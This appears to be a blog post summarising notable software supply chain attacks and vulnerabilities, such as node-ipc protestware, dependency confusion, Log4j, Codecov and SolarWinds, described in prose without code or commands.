Compared with traditional security threats, supply chain threats have a spreading influence. Vulnerabilities of upstream products will affect all downstream roles, causing security risks to spread along the supply chain and consequently expanding the attack area.
In recent years, several influential supply chain attacks have taken place, involving open-source components, public code repositories, and cloud security CI/CD platforms, among others.
Major media, logistics, and industrial companies in Germany were attacked by a series of malicious NPM software packages that were added with backdoor code in the form of dependency confusion attacks. Researchers believe the attack is highly targeted and dependent on insider information that is difficult to obtain. A German penetration testing company Code White claimed responsibility for this incident, explaining that it was a part of an attack simulation effort for their clients — kudos to them on the elaborate attack.
Following the weekly million-level downloads of the NPM package ‘node-ipc’ that attacked the supply chain in the name of anti-war, another developer jumped out. On March 17, the Russian developer Viktor Mukhachev added an anti-war code segment to his popular NPM repository “event-source- polyfill”. This code segment referenced in version 1.0.26 sends a 15s anti-war message to every Russian user who opens any application that is built with the repository.
An attacker registered a series of duplicate-named component packages containing malicious code in the NPM repository to attack the supply chains of Azure developers by typosquatting.
Open-Source Components, Code Injection
node-ipc is a widely used NPM open-source component. Its author poisoned the code repository for his personal political standpoint by adding a malicious js file that creates anti-war slogans on users’ desktops. In-depth investigations reveal that the author also added malicious code that erases the user data in Russian and Belarus areas. Unity Hub, Vuecli, and some other widely used third-party software were affected by this attack.
Open-Source Components, Code Injection
Marak Squires, the main developer of two NPM packages—faker.js and color.js—that are widely used, deleted all his github codes and pushed updates that included sham functions (printing gibberish) to the NPM repository because of poverty and no return from project maintenance. Numerous applications, including aws-cdk, have been affected, triggering a hot discussion about the returns to maintenance roles of open-source ecosystems and open-source projects.
Open-Source Components, Software Vulnerabilities
Apache Log4j2 is an open-source basic log library, an upgrade to Log4j components, and is widely used in development, testing, and production. It supports attribute searching and enables various attributes to be replaced in logs. Users can retrieve variables through JNDI, but there is a JNDI injection vulnerability because the query address is not filtered. Log4j2 is widely used and has a wide range of influence. As the supply chain links increase and the software structures become more and more complex, the above vulnerabilities are more difficult to identify and fix (especially for projects that indirectly use the component). At present, the common forms of attacks are ransomware, mining, and botnet (and DDoS).
The Microsoft Azure Container-as-a-Service platform has a cross-account takeover vulnerability due to the use of an outdated RunC tool (v1.0.0-rc2). Attackers can tear down the K8s clusters hosting ACIs, take over the containers of other customers on the platform, execute codes, and access the data on the platform.
A repository attacker committed malicious code to a private GitHub repository, changing the front end of the auction site of a company and replacing the wallet address with his own. The root cause of this attack is that the branch protection settings are not enforced in the repository.
The development kit (SDK) of Realtek’s WiFi module has several vulnerabilities, such as command injection, HTTP memory corruption, and user-defined web services. Attackers may exploit these vulnerabilities to break down the target devices and get the highest permissions to execute arbitrary code.
Code Injection, IT Management Platform, Downstream Impact
REvil, a criminal gang ransomware, carried out ransomware attacks on several Management Service Providers (MSPs). Investigations revealed that all these MSPs used the VSA service from Kaseya, which enables unified remote monitoring and management of customer terminals. As Kaseya was captured, its product was implanted with malicious code, causing more than 1,500 downstream users and enterprises being infected.
All the Pling-based free open-source software markets on the Linux platform have a vulnerability in that their browsers do not implement a same origin policy for local WebSocket server links. Attackers may exploit this vulnerability for XSS worm attacks or remote code execution attacks.
May 2021 Information Breach
Colonial Pipeline is one of the largest fuel pipeline operators in the United States. By taking advantage of Colonial Pipeline’s VPN accounts and passwords leaked on the dark web, a criminal group Darkside successfully hacked the company’s website, stole massive data, and installed ransomware, eventually forcing the company to pay approximately $4.4 million.
CI/CD, Basic Image
Due to an error in the builds of the Docker images, the bash uploader script in the Codecov product of a code testing company was modified, resulting in the product sending sensitive and confidential information such as source code, credentials, and tokens of customers in Continuous Integration (CI) to the attacker’s server.
Information Breach, Downstream Impact
A Silicon Valley start-up Verkeda’s camera database was breached, leaking the real-time images of around 15,000 surveillance cameras. The root cause is that the username and password of an admin account were disclosed.
Public Code Repository, Code Implantation
PHP’s independent git infrastructure, the git.php.net server, was attacked. Two hackers pretended to be the maintenance personnel to push malicious commits to the repositories on the server and successfully implanted a backdoor. That backdoor can obtain permission for remote code execution for HTTP requests from the website system.
Open-Source Components, Dependency Confusion
A security researcher Alex Birsan successfully invaded the intranets of 35 international IT giants, including Microsoft, Apple, PayPal, Tesla, and Uber, by exploiting a vulnerability (i.e., dependency confusion) of the open-source ecological security mechanism.
Cloud Security, Downstream Impact
Mimecast provides cloud security and risk management services for email and enterprise information. In January 2021, it was found that an attacker successfully hacked the Mimecast service and obtained a certificate issued by Mimecast for Microsoft 365 users, enabling the attacker to interfere with links and steal information from Mimecast’s server.
Software Supplier, Downstream Impact
SolarWinds suffered a supply chain attack by a national APT gang, bringing a serious impact on tremendous customers in various industries in the United States. The attack process is as follows: 1) Attackers invade SolarWinds first to reach an initial compromise; 2) Attackers tamper with the software to deploy a backdoor, and then use legal certificates to sign the components that have been implanted with the backdoor; 3) attackers monitor the technical environment, identify vulnerabilities, and perform a series of operations such as privilege elevation and lateral movement to penetrate into SolarWinds and obtain user data. Possible attack technologies include social engineering attacks, brute-force attacks, and zero-day vulnerability exploitation.
Code Injection, Downstream Impact
Hackers attacked the Vietnam Government Certification Authority (VGCA) and implanted a backdoor in the client application. This backdoor can either receive plug-ins or retrieve the victims’ proxy configuration. Attackers can use it to contact the C&C server and execute commands. Its old version, PhantomNet, was discovered in the Philippines.
Software Vulnerabilities, Password Managers, Digital Certificates
WIZVERA VeraPort is an integrated installation tool developed in South Korea. It helps users manage the security software required for visiting government and bank websites. In use, the software only authenticates whether the downloaded binary file digital signature is valid, but does not verify its source. Lazarus Cybercrime exploits this vulnerability to sign and place with malware by using stolen digital certificates for sites that support VeraPort, causing users to download malware.
Previous posts on software supply chain security: